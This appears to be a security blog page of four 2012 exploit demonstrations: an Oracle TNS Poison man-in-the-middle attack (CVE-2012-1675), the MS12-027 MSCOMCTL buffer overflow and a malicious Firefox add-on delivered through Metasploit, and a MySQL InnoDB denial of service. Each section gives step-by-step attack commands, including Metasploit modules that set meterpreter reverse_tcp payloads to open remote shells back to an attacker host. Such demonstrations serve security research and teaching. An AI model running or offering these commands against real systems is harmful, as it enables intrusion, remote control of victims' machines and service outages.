CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

Exploits

Timeline :

Vulnerability discovered by Joxean Koret in 2008
Vulberability reported to the vendor by Joxean Koret in 2008
Public release of the vulnerability in Oracle CPU by the vendor the 2012-04-17
Details and PoC of the vulnerability released by Joxean Koret the 2012-04-18
Fake patching of the vulnerability discovered by Joxean Koret the 2012-04-26

PoC provided by :

Joxean Koret

Reference(s) :

Oracle CPU of April 2012
Joxean Koret details and PoC
CVE-2012-1675
Oracle Security Alert for CVE-2012-1675

Affected version(s) :

All versions of Oracle Database

Tested with :

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

Description :

Usage of Joxean Koret PoC require that the database name has a length of 6 characters.

Database server characteristics :

IP : 192.168.178.150
Oracle version : 10.2.0.4.0
Database listener port : 1521
Database listener has no clients IPs restrictions
Database name : arcsig
Database username : arcsig
Database password : testtest

Database client characteristics :

IP : 192.168.178.151
SQL*Plus version : 10.2.0.4.0

tnsnames.ora” file as bellow :

TARGET.DB=
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
(CONNECT_DATA =
(SERVICE_NAME= arcsig)
)
)

Attacker characteristics :

IP : 192.168.178.100
Usage of PoC provided by Joxean Koret

Demonstration :

PoC validation phase

On database server :

ifconfig
ps faux
netstat -tan

On database client :

ifconfig
sqlplus -v
cat tnsnames.ora
sqlplus [email protected]
HELP
QUIT

PoC exploitation phase

On attacker :

Start the MITM proxy, how will intercept the communication between the client and the database :

sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521

Start the vulnerability exploitation :

python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521

On the database client :

Connect with SQL*Plus
sqlplus [email protected]
?
? INDEX
TOTO
QUIT

You can see that the communication are intercepted by the proxy.

MS12-027 MSCOMCTL ActiveX Buffer Overflow Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability reported by Unknown to the vendor
Public release of the vulnerability the 2012-04-10
Vulnerability found exploited in targeted attacks the 2012-04-12
Metasploit PoC provided the 2012-04-23

PoC provided by :

Unknown
juan vazquez
sinn3r

Reference(s) :

CVE-2012-0158
MS12-027
OSVDB-81125

Affected version(s) :

Microsoft Office 2003 SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2007 SP2
Microsoft Office 2007 SP3
Microsoft Office 2010 32-bit
Microsoft Office 2010 SP1 32-bit
Microsoft SQL Server 2000 Analysis SP4
Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2005 Express Edition with Advanced SP4
Microsoft SQL Server 2005 for 32-bit SP4
Microsoft SQL Server 2005 for x64-bit SP4
Microsoft SQL Server 2008 for 32-bit SP2
Microsoft SQL Server 2008 for 32-bit SP3
Microsoft SQL Server 2008 for x64-bit SP2
Microsoft SQL Server 2008 for x64-bit SP3
Microsoft SQL Server 2008 R2 for 32-bit
Microsoft SQL Server 2008 R2 for x64-bit
Microsoft BizTalk Server 2002 SP1
Microsoft Commerce Server 2002 SP4
Microsoft Commerce Server 2007 SP2
Microsoft Commerce Server 2009
Microsoft Commerce Server 2009 R2
Microsoft Visual FoxPro 8.0 SP1
Microsoft Visual FoxPro 9.0 SP2
Visual Basic 6.0 Runtime

Tested on Windows XP Pro SP3 with :

Microsoft Office Word 2007 (12.0.4518.104)

Description :

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after office got load, so the malicious file must be loaded through “File / Open” to achieve exploitation.

Commands :

use exploit/windows/fileformat/ms12_027_mscomctl_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit -j

getuid
sysinfo

Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found Jason Avery the 2007-06-27
Metasploit PoC provided the 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be “bootstrapped”. As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Exploits, ,

Timeline :

Public release of the vulnerabilities the 2012-03-21
Details of the vulnerability published by Oracle the 2012-04-10
PoC provided by Oracle the 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

Oracle has release, the 21 March, two new versions of MySQL, version 5.5.22 and 5.1.62. These versions have fix two bugs #13510739 and #63775 how are considered as security fixes. But no impact details of these bugs are provided and the bugs report are closed.
Unfortunately for Oracle the two new versions were shipped with a development script “mysql-test/suite/innodb/t/innodb_bug13510739.test” in order to test the fix of the vulnerabilities, a PoC provided by Oracle. The bugs cause a denial of service of MySQL “ON HANDLER READ NEXT AFTER DELETE RECORD“. All the details are available in the script or on the upper Pastebin link.

Commands :

mysql -u root -p database < innodb_bug13510739.test